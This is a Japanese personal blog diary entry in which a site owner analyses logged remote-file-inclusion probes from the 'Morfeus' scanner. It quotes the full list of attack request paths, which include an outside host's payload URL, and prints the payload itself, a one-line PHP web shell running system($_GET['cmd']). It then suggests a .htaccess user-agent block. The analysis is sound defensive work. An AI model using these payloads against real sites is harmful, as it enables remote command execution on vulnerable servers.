にっき
2007/03/23 16:18:06
あたっく・・・なの?
ここのろぐじゃないけど探してもさっぱり情報ないのに条件が揃うと危険があぶないっぽいからめもめも☆
ってことで "Morfeus Fucking Scanner" なんてゆ〜ざえ〜じぇんとの中の人がぺちぺちと
引用:
こんなかんじで 404 をいっぱい叩いてきたから調べてみたにう(ーxー;【みかん
このりくえすとだけでも設置してある php の脆弱性をついてこの
をいんくる〜どさせてなにかしようとしてるかんじがすっごくするにう(ーxー;【みかん
ってことでこのふぁいるの中身を☆
・・・任意のこまんどを実行できるたいぷっぽいにゃぁ・・・
でもこれって PHP の設定が
こんな化石のような状態で,さらに外部ふぁいるの include ができる脆弱性付きのすくりぷとを設置してないと
成功しにゃい気がするのは気のせいにう?(´・ω・`;【みかん
とりあえずゆ〜ざえ〜じぇんとはちゃんとついてるみたいだから .htaccess で
こんなかんじに描けばかっと完了なのかなぁ?
ちなみに今回採取できたろぐを見ると
をた〜げっとにしてるっぽいので心当たりあるかたはちぇっくしてみてくださいなです☆ヾ(´ω`;【みかん
なんだか管理画面狙ってるのが多いし,つい最近せきゅりてぃ警告が出たのもあるんだけど・・・
今回のって攻撃元が中国からで攻撃用すくりぷと(?)のあるさ〜ばが香港っぽいけど・・・
やっぱりのんびり運営してる個人さいとではこのあたりからのあくせす拒否しといたほうがいいのかにゃぁ・・・
たぶんきっと関係ないひとのほうが多いとは思うんだけどすぱむのほとんどは外国からにう(つx;【みかん
ってことで "Morfeus Fucking Scanner" なんてゆ〜ざえ〜じぇんとの中の人がぺちぺちと
引用:
/admin/includes/createemails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.txt?&/
/BE_config.php?_PSL[classdir]=http://203.198.68.236/~lisir/M.txt?&/
/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://203.198.68.236/~lisir/M.txt?&/
/components/com_loudmounth/includes/abbc/abbc.class.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/
/components/com_rsgallery2/rsgallery.html.php?mosConfig_absolute_path=http://203.198.68.236/~lisir/M.txt?&/
/createemails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.txt?&/
/index.php?page=http://203.198.68.236/~lisir/M.txt?&/
/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=http://203.198.68.236/~lisir/M.txt?/
/send_emails.inc.php?ROOTDIR=http://203.198.68.236/~lisir/M.txt?&/
/spaw/spaw_control.class.php?spaw_root=http://203.198.68.236/~lisir/M.txt?&/
/WebCalendar/ws/get_events.php?includedir=http://203.198.68.236/~lisir/M.txt?&/
/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=http://203.198.68.236/~lisir/M.txt?&/
/wikiwig/_wk/wk_lang.php?WK[wkPath]=http://203.198.68.236/~lisir/M.txt?&/
こんなかんじで 404 をいっぱい叩いてきたから調べてみたにう(ーxー;【みかん
このりくえすとだけでも設置してある php の脆弱性をついてこの
http://203.198.68.236/~lisir/M.txt
をいんくる〜どさせてなにかしようとしてるかんじがすっごくするにう(ーxー;【みかん
ってことでこのふぁいるの中身を☆
<?
system($_GET['cmd']);
die ("Morfeus hacked you");
?>
・・・任意のこまんどを実行できるたいぷっぽいにゃぁ・・・
でもこれって PHP の設定が
register_grobals = on
allow_url_fopen = on
short_open_tag = on
こんな化石のような状態で,さらに外部ふぁいるの include ができる脆弱性付きのすくりぷとを設置してないと
成功しにゃい気がするのは気のせいにう?(´・ω・`;【みかん
とりあえずゆ〜ざえ〜じぇんとはちゃんとついてるみたいだから .htaccess で
SetEnvIf User-Agent "^Morfeus" ...
こんなかんじに描けばかっと完了なのかなぁ?
ちなみに今回採取できたろぐを見ると
SendStudio ←ROOTDIR の上書き
Mambo ←mosConfig_live_site か mosConfig_absolute_path か CONFIG_EXT['LANGUAGES_DIR'] の上書き
Back-End CMS ←_PSL['classdir'] の上書き
WebCalendar ←includedir の上書き
Limbo-CMS ←classes_dir の上書き
Joomla ←phpbb_root_path の上書き
→sbp の上書きもあってこっちは画像あっぷろ〜どっぽいのですてきに致命的かも?
Dokeos Learning Management System ←includePath の上書き
Fast Click ←path の上書き
PHP Live! ←css_path の上書き
phpBB ←phpbb_root_path の上書き
mxBB ←mx_root_path の上書き
MyPHPNuke ←adminpath の上書き
Phorum ←db_file の上書き
Sabdrimer CMS ←pluginpath[0] の上書き
aardvark topsites php ←FORM['url'],CONFIG['captcha'],CONFIG['path'] をまとめて上書き
spaw ←spaw_root の上書き
SQuery ←libpath の上書き
V-webmail ←CONFIG['pear_dir'] の上書き
Wikiwig ←WK['wkPath'] の上書き
index.php で page の上書きだけど・・・
これだけどれがた〜げっとなのかわかんにゃいの・・・ (つx;【みかん
をた〜げっとにしてるっぽいので心当たりあるかたはちぇっくしてみてくださいなです☆ヾ(´ω`;【みかん
なんだか管理画面狙ってるのが多いし,つい最近せきゅりてぃ警告が出たのもあるんだけど・・・
今回のって攻撃元が中国からで攻撃用すくりぷと(?)のあるさ〜ばが香港っぽいけど・・・
やっぱりのんびり運営してる個人さいとではこのあたりからのあくせす拒否しといたほうがいいのかにゃぁ・・・
たぶんきっと関係ないひとのほうが多いとは思うんだけどすぱむのほとんどは外国からにう(つx;【みかん
こめんと
投稿された内容の著作権はこめんとの投稿者に帰属するっぽいです☆また,現在 IE6 以下で Sleipnir,Lunascape,Donut じゃないゆ〜ざえ〜じぇんとからの描き込みを制限してますです☆
該当しちゃうかたはてきとうにゆ〜ざえ〜じぇんとを偽装しちゃってくださいです(´ω`;【みかん